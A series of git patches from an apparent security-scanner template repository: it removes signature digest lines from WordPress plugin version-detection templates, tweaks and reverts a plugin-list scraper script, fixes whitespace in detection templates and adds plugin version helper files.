'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b1cae3ac4cca68105e1746d1b4d2cd0b6f81367ff54e666046dab46844da715c02201412d3db81494a46a9286f307bf564a9d9d7674a9b1106e56d3da6e8ba3dace2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 0b68af503b..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b819f582e9fa174b7c5251b63ef149c257c3ae7d623f0c28e6d4565a25e05b20221008b62d9fb4d1256cea7a9aa59b16231232b8421eacd02d6c0f8aa72f8ad77dbe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 6dbabef767..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ba1c1166a3197b98ab8f09001db33e7d2a601d7f1c061ec60661d64a78268e1802201b3848eaaf424f4a182c15f817b6a643329aee21a783031a5e858a4b979e4d7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index ba9d01fbaa..1fd49d2e08 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d029f4b2152ccb528b01bfbe7bc2ee6d54d107d2b22ee5e4073e086ed3c122ae0221008889884675f66abfc9ee66e51a7e749a183f925dc0f03b171446ffacc1bd15d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 43a3cc4fbd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220125e234a08aaca9f04784503ae8adccb17d2e3d473abcd352bd7837395be4b610220767666127e439e8e44935901cdf9e26162598d5996a111c7070a6207ba2f5649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index fffff49819..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d9eaa9bfb917286e69a299c186ab3212aa0bc88aa28651d8f39e5760742069d2022100877ba78f6de94d68bfda45147770940f68e466c5eb46e0571bea92f70c171d0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 30f745ffd3..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220704ec539accaf7f89e27efceda95dbd88000512c97a4d4956b68957cbcd1c189022014a47c1bc993b4d63bd3f58308ef41e42dfcc65be74d17683944a9e8c72a5cc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index fa45bb5bd6..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e8334cf4e5710ff7c62102abb8af0b05fba2f24230b42ccdc122e15c799944c022009a960c67e58d5207e6e2187519fb752d49037935dbfe25c19d66ed24c7c7c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 30fec6bb3d..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e13fff57affc0743ba4c0a9b9c994c5f35880f11dd153893a2fe226437046550221009822da8cfd854be2947f9cb88dc135f63d9741c8cb5930533e4c38a2f13d8adb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index d37278f20a..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022009a70d78ef7f9292fa6dbee21078066833b9ab2e9dcfc1253f32d0762a17cee3022032617f6949d27569009290b9375e75ae4d750cf2525d54c17f16436535508901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index ff9b10cf45..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ee57ce58f4a2c3e738f3d9fe041f4dc02ef1d65784e47436817c5413c3f4e9a022036a5158aeadd606c4f813ceb91eebd4630b510024fd6d84b0107c8d566fb4bb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 8fd8608266..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022023d0d1ac67555f7d0561571ce75fd684f4f2c4da98aabaa12976671764f44f8e022100f119014442efed2007546e4811c21c57282aa5c2374027ed1101fa73405c1207:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 3c0ec7d455..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022039b584d503acf77a3d493833b3015533635d31e9e87e9591c9334056504107b2022100d917f3aa16ade9f5051130e5ff6d9302fab4ff905088670e7d11274c4528a527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 4720d9ff1c..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100866281089fb1c9cc73e2cc5b8e1b0b31ac21297182e5d51913cd7f89d440d0740221009a178659851a541d43f78df3fbd2d3e42a6b2d8e304eb8066ac1c06123bbbc7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 5a7e452c54..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022043aa45a5841ce7c4a9add2d9261ce58818fcb69edfe1ddb43958a0fd8d8103d4022100c73844b04e2f6df49c0b7bc229ba22f64b536546077ad306b5c0daf0e794b086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index ba116942b5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d28058b7a9d9d525c0bef3e50dc830826e3361ac0e4698f461eced0e01bf917b022100da16d6434aec37f2dc5d2e66f4b58d5fed0c97bada94b4722763cff169a25fd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 6a9188d9af..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ccd6f6e6a0c7a39bf6a9b7106c5842e190d88487e6e97cfcca1d35cffae1e81022100ef2c85e6dfe8cc154ff42f4094de12e61f4207eaf27133a0f82ab93b040bbc84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 4e6d35b706..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a8d741bfddc69446745669c5d6bb49d796e0061350e87a2b2895fb7df3e1f9302205a691f370f7dd490a4173724dc95ec92e1b37c36c1831a32d73353835114c850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 3b2da021b0..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dc66cd422f0d912657a8c43b01c30572452caf99d1082ffb9e7443bb44318bc302203be197211801983135c21f502fbf0094d0df135e1197dc020aa6662b68ec4647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index cc5197bc3f..34115bcd0f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220141f543468eb777d045955d62707b1a2401c08c93bac002fcd3663628322a033022100a62647d5e1b3873b826837e2a4c059db474f8fddac8f1fcea6ef2435c90933f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index ad24354d3a..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220531d98196fbf83034671b7e35591dcf10a6c3554e565d29c44901928557b69a70220656cf4950b5e91de98ab737d1c33c6c215917ecf65ebabc7483f47cab9cf6229:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 5ee25f5c14..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d0a36259fca36469842fbea8ee6166c39f6014d2ca515aab925bdba827ca794c022100e6a55de6e2f63a7cd000dc0a243da5f5e25762184eb8d0faad8e0fd80872bb62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index a5d1509568..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022064aa055c9fca5632700f9dd3d92627a2c0cb6a4ac5219b8e9597f4db042a4707022100e941f04eea535304a0b0173f44c32def885d2c7372e82777c5054c6c72392728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index c831ba3cb9..c3ec4ebd80 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f5be215787140c1b263b6a6ad7b51eae21f8fd18b132c20501044dafc8a8e23b0220037c35ff81e49654d1b25a6e7349bdac37e7939cfdd6f3fb397ce1752dddcb82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 3b87f339b3..2276545093 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204a5a39994c472bf3a48441cc86d79fc575fc2c29d9fc36467692f83f1a82682b022100da8af0467ee5fe40d2e8296df0ac693db5ac189490df37aeef1b42717b4f5245:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index fa04af966a..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fe1dcf4feb0bc8f3b677567eca90de6543b6c9acc89ab03e11b02126f6411d08022100c5480d233b3ab77b4cda7a528a3d6e140fe309b3c29fb9df3e31ba4ecb764f99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index c7206f278a..7b28bf7020 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c73d83408a950b529a260878cc134d8f080b1b948700831a5945366cd90ffc00220622ef4d82ea6680aa16801bcab89ea862395d928cb2a85c20b49fe70e8898609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 71ce8df018..da6abc2a81 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e150045f4acb9f70ec52c1f2ad3ef2950a661e85cea28c77f837bfc3ddfe52500220183e4b315bda395c6c4d23b248a2ea2b539c1242cd3083422624fd6158555679:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 3553b349e0..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ed5183942c3a5a7a6a2d9b47221e037e29470f95db6cb589a0d2e935e235eb00220547b4d617c2cb263f46f7f0ab072824ca647612fd97e4ee8342ddfd2b67818cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 2966067686..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009aea4c22b43d840738b7118888c5e51364be5c1d69389a015e13960a7221905d02206e989b73861efc7777e1cf3a4f8eba34fdb6e56afe3ce1f4983ee74c92a0be7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 267830df01..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a8d67b168861dd91faa01377fa81880ff8940d0028e03627ff401db59a36460202201ee890ce59676c72df46fc0c07a0c498dfa9fd08f9649131a677adb31499f861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index afbd611c0b..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200551cdb6ba572a6bd1ae166d70d4371311ebbf4c10b2a11476dc8797f9e2be4e02207f44474716f1922b954ad222c4d873579ec0b1fab584bd7f7e31556671fa1610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 97dd565f7f..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eaa0560e84a18b3284992fc27cd22ba56337b06a01a42b65d908cf56bc4b14bb022076d6102ab2417d78ffcd27c8876f81f92e848472aba77fab0722e5d11b794c31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 7048a60f56..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009d224678b59da2de95683270709f318411e5dc2225d30ea14a3e68272b17ef74022100ec683274251ead407094e0b9cce75ccf08d5ea49d47babbff9f2beb43a5ec11b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index e73c97cd9f..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f80cf3ff9b2c1c7741b8c8f0475790c97bbdf9104645c6d6d7a701e387c6cdd1022033f930219b55d1a474cdcc20963f0e9f883cc6a7ef8df7ec168fed396b62ce48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6f8c1cc871ce5fd09f4e8756c807762065b8c002 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 09:31:44 +0530 Subject: [PATCH 0425/1841] Update wordpress-plugins-update.py --- .github/scripts/wordpress-plugins-update.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index 4d57c1873b..da31e5e898 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -43,8 +43,8 @@ for page_number in range(1, 11): # Parse HTML soup = BeautifulSoup(html, 'html.parser') - results = soup.find(class_="plugin-cards") - articles = results.find_all("div", class_="plugin-card") + results = soup.find(id="main") + articles = results.find_all("article", class_="plugin-card") # Setting the top tag top_tag = "top-100,top-200" if page_number <= 5 else "top-200" From beeba1b4c3d27cb48f4dabb2e084cd5632e0d922 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 09:39:48 +0530 Subject: [PATCH 0426/1841] Revert "Update wordpress-plugins-update.py" --- .github/scripts/wordpress-plugins-update.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index da31e5e898..4d57c1873b 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -43,8 +43,8 @@ for page_number in range(1, 11): # Parse HTML soup = BeautifulSoup(html, 'html.parser') - results = soup.find(id="main") - articles = results.find_all("article", class_="plugin-card") + results = soup.find(class_="plugin-cards") + articles = results.find_all("div", class_="plugin-card") # Setting the top tag top_tag = "top-100,top-200" if page_number <= 5 else "top-200" From fab0724d757b8703ad9b6dc5ea9798a048a3475c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 09:41:25 +0530 Subject: [PATCH 0427/1841] trail space fix --- file/malware/hash/ico-malware.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/file/malware/hash/ico-malware.yaml b/file/malware/hash/ico-malware.yaml index 0e9dfa61f4..0dd5dd4b2a 100644 --- a/file/malware/hash/ico-malware.yaml +++ b/file/malware/hash/ico-malware.yaml @@ -22,5 +22,3 @@ file: - "sha256(raw) == '7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896'" - "sha256(raw) == 'aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868'" condition: or - - From 3db8393d09ff5708c5fb827f9c7b0a3c5a6e04de Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 09:42:02 +0530 Subject: [PATCH 0428/1841] minor update --- http/technologies/apache-allura-detect.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/technologies/apache-allura-detect.yaml b/http/technologies/apache-allura-detect.yaml index 1424e364e1..902cf2ae2d 100644 --- a/http/technologies/apache-allura-detect.yaml +++ b/http/technologies/apache-allura-detect.yaml @@ -9,8 +9,7 @@ info: reference: - https://allura.apache.org/ classification: - cpe: cpe:2.3:a:apache:allura:*:*:*:*:*:*:*:* - + cpe: cpe:2.3:a:apache:allura:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache From 59fc7e4fa6ca2c61d6cdda0d6ba3c33349015a78 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 09:54:09 +0530 Subject: [PATCH 0429/1841] Create woocommerce-legacy-rest-api.txt --- helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt diff --git a/helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt b/helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt new file mode 100644 index 0000000000..ee90284c27 --- /dev/null +++ b/helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt @@ -0,0 +1 @@ +1.0.4 From c4f38196223dc6e5f5aefca3703273841c075e97 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 09:54:56 +0530 Subject: [PATCH 0430/1841] Create copy-delete-posts.txt --- helpers/wordpress/plugins/copy-delete-posts.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 helpers/wordpress/plugins/copy-delete-posts.txt diff --git a/helpers/wordpress/plugins/copy-delete-posts.txt b/helpers/wordpress/plugins/copy-delete-posts.txt new file mode 100644 index 0000000000..c514bd85c2 --- /dev/null +++ b/helpers/wordpress/plugins/copy-delete-posts.txt @@ -0,0 +1 @@ +1.4.6 From a19eb07f57ea53f89e5e6a8495eac1d62c3d2ea0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 09:56:05 +0530 Subject: [PATCH 0431/1841] Create image-optimization.txt --- helpers/wordpress/plugins/image-optimization.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 helpers/wordpress/plugins/image-optimization.txt diff --git a/helpers/wordpress/plugins/image-optimization.txt b/helpers/wordpress/plugins/image-optimization.txt new file mode 100644 index 0000000000..f0bb29e763 --- /dev/null +++ b/helpers/wordpress/plugins/image-optimization.txt @@ -0,0 +1 @@ +1.3.0 From 3d0ca72bc7f57327cba54b9db3314f7ddeb86a2f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 09:56:40 +0530 Subject: [PATCH 0432/1841] Create simple-history.txt --- helpers/wordpress/plugins/simple-history.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 helpers/wordpress/plugins/simple-history.txt diff --git a/helpers/wordpress/plugins/simple-history.txt b/helpers/wordpress/plugins/simple-history.txt new file mode 100644 index 0000000000..fb0557132b --- /dev/null +++ b/helpers/wordpress/plugins/simple-history.txt @@ -0,0 +1 @@ +4.15.1 From 2ebb2ae11cbd47a1b0cce6f551089906be1e336e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 09:57:15 +0530 Subject: [PATCH 0433/1841] Create royal-elementor-addons.txt --- helpers/wordpress/plugins/royal-elementor-addons.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 helpers/wordpress/plugins/royal-elementor-addons.txt diff --git a/helpers/wordpress/plugins/royal-elementor-addons.txt b/helpers/wordpress/plugins/royal-elementor-addons.txt new file mode 100644 index 0000000000..b9bd0f0e1c --- /dev/null +++ b/helpers/wordpress/plugins/royal-elementor-addons.txt @@ -0,0 +1 @@ +1.3.977 From 6423f392f592f382cc6043c3495c2aebc2c7624a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 09:59:35 +0530 Subject: [PATCH 0434/1841] Create sticky-header-effects-for-elementor.txt --- .../wordpress/plugins/sticky-header-effects-for-elementor.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt diff --git a/helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt b/helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt new file mode 100644 index 0000000000..99c026bdee --- /dev/null +++ b/helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt @@ -0,0 +1 @@ +1.6.11 From 483916e37d9a34125450c6f1264ad33cf0ee98d4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 20 Jun 2024 10:14:56 +0530 Subject: [PATCH 0435/1841] merge body matchers in one --- http/cves/2017/CVE-2017-18536.yaml | 9 +++------ 1 file changed, 